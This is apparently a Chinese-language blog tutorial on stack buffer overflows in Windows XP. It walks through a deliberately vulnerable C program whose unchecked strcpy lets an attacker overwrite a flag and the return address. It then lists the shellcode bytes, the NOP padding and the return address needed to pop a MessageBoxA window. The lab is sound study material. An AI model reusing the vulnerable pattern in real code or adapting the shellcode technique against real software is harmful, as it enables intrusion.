winXP栈溢出漏洞深度学习

一:环境

windowsXP,vc6,ollydbg,ultraedit

二:覆盖邻接变量

原理:利用strcpy函数不会检查长度的漏洞,覆盖临近数组的flag变量,从而绕过验证

先构建一个漏洞程序

因为栈的生长方向是从高地址到低地址的,也就是先声明的变量在高地址,后声明的变量在低地址

栈向下生长,但数组向上溢出,我们的buffer数组预先只定义了44个字节的位置,所以buffr数组溢出的第一个字节就是flag的位置

在vc6里面新建一个空项目,添加一个.c文件

复制代码
#include <stdio.h>
#include <windows.h>
#include <string.h>

#define REGCODE "12345678"

int verify(char *code)
{
    int flag;    //邻接变量,位于buffer下方
    char buffer[44];    //缓冲区,共44字节
    flag = strcmp(REGCODE, code);
    strcpy(buffer, code);    //无长度检查的strcpy函数
    return flag;    //是否通过验证
}

void main()
{
    int vFlag = 0;
    char regcode[1024];
    FILE *fp;
    
    LoadLibrary("user32.dll");
    
    if (!(fp = fopen("reg.txt", "r+")))
        exit(0);
    
    fscanf(fp, "%s", regcode);
    //fp:文件指针
    //fscanf会在字符串末尾自动添加'\0'
    vFlag = verify(regcode);
    
    if (vFlag)
        printf("wrong regcode!");
    else
        printf("passed!");
    
    fclose(fp);
}

编译

在debug文件同层创建一个reg.txt,写入密码12345678,运行看看有没有问题

正常

输入44个'1',填充44个字节没因为fscanf会自动在末尾加上\0,这个\0会覆盖flag的最低位,把flag从1变成0,表示验证通过了

防御方向:限制复制长度

二:植入shellcode(运行漏洞程序后令win系统弹出弹窗)

user32.dll:win动态链接库,包含messageboxa函数

MessageBoxA:是Windows 系统中弹出提示框的 API 函数。调用它就能显示一个窗口

实现思路:后面的 shellcode 需要直接调用 MessageBoxA,但代码里不能写函数名(因为植入的是机器码),必须知道它在内存中的入口地址,然后让程序跳转到这个地址去执行。

所以我们先通过这个c代码得到

在 Windows XP 中,user32.dll 的加载基址是 0x77D10000。

MessageBoxA 在 user32.dll 中的偏移是 0x000407EA。

入口地址 = 基址 + 偏移 =0x77D10000 + 0x000407EA = 0x77D507EA

ollydbg打开exe文件,在菜单的试图里面找到调试窗口→watch

在watch窗口里面搜一下&buffer

得到buffer的地址:0x0012faf0

开始构建shellcode,首先,调用MessageBoxA函数,我们需要四个参数:

|---|-----------------|---------------------------------------------|
| 1 | hWnd------父窗口句柄 | 指定哪个窗口作为消息框的父窗口,这个实验我们传进去0/NULL,表示这是一个独立的窗口 |
| 2 | IpText | 显示的文本 |
| 3 | IpCaption | 标题栏文字 |
| 4 | uType | 按钮类型,这个实验传0,代表只显示确定按钮 |

在win中,压栈顺序是从右往左,所以参数顺序是4321,之后就可以调用MessageBoxA

在压到3,2参数部分的时候,要对字符串进行处理,要先把字符串写入栈内存,再把字符串的地址作为参数进行传递

顺序如下:

汇编 机器码 作用
XOR EBX, EBX 33 DB EBX = 0
PUSH EBX 53 压入 uType=0(参数4)
PUSH 0x74736577 68 77 65 73 74 压入 "west"
PUSH 0x74736577 68 77 65 73 74 压入 "west"
MOV EAX, ESP 8B C4 EAX = 字符串地址
PUSH EBX 53 压入 hWnd=0(参数1)
PUSH EAX 50 压入 lpText(参数2)
PUSH EAX 50 压入 lpCaption(参数3)
PUSH EBX 53 压入 uType=0(参数4)
MOV EAX, 0x77D507EA B8 EA 07 D5 77 函数地址入 EAX
CALL EAX FF D0 调用

以上0~25这段机器码就是弹窗部分

26~43内18个字节用90填充,表示NOP指令,什么都不做

44~47内四个字节用90填充,覆盖旧的flag

48~51四个字节用90填充,覆盖旧的EBP栈顶指针

(因为返回地址再flag和EBP后面,要覆盖返回地址,必须先把前52个字节填满,90=NOP(空操作),CPU执行到这里什么都不做,继续往下)

52~55四个字节填充 F0 FA 12 00,表示返回地址→指向buffer[0]

打开UltraEdit,CTRL+G进入十六进制,开始填充机器码

之后保存到debug的同层------reg.txt

再次运行程序,成功跳出弹窗

相关推荐
C2H5OH1 天前
PortSwigger SQL注入LAB7 & LAB8 & LAB9
网络安全
small_white_robot1 天前
(Win)文件上传数据流绕过-面试常考
网络·安全·web安全·网络安全
宋浮檀s1 天前
SQL注入基础+DVWA搭建
数据库·sql·安全·网络安全
汤愈韬2 天前
hcip-security_防火墙高可靠技术4—双机热备结合NAT
网络·网络协议·网络安全·security
Luminbox紫创测控2 天前
基于环境舱的新能源汽车三高试验方法与热响应评估
大数据·人工智能·测试工具·汽车·安全性测试·测试标准
虚拟世界AI2 天前
从零到黑客:渗透测试实战指南
网络安全·渗透测试
X7x52 天前
堡垒机:企业运维安全的“数字守门人“
网络安全·网络攻击模型·安全威胁分析·堡垒机·安全架构
ze^02 天前
Day03 Web应用&OSS存储&负载均衡&CDN加速&反向代理&WAF防护&部署影响
web安全·网络安全·架构·安全架构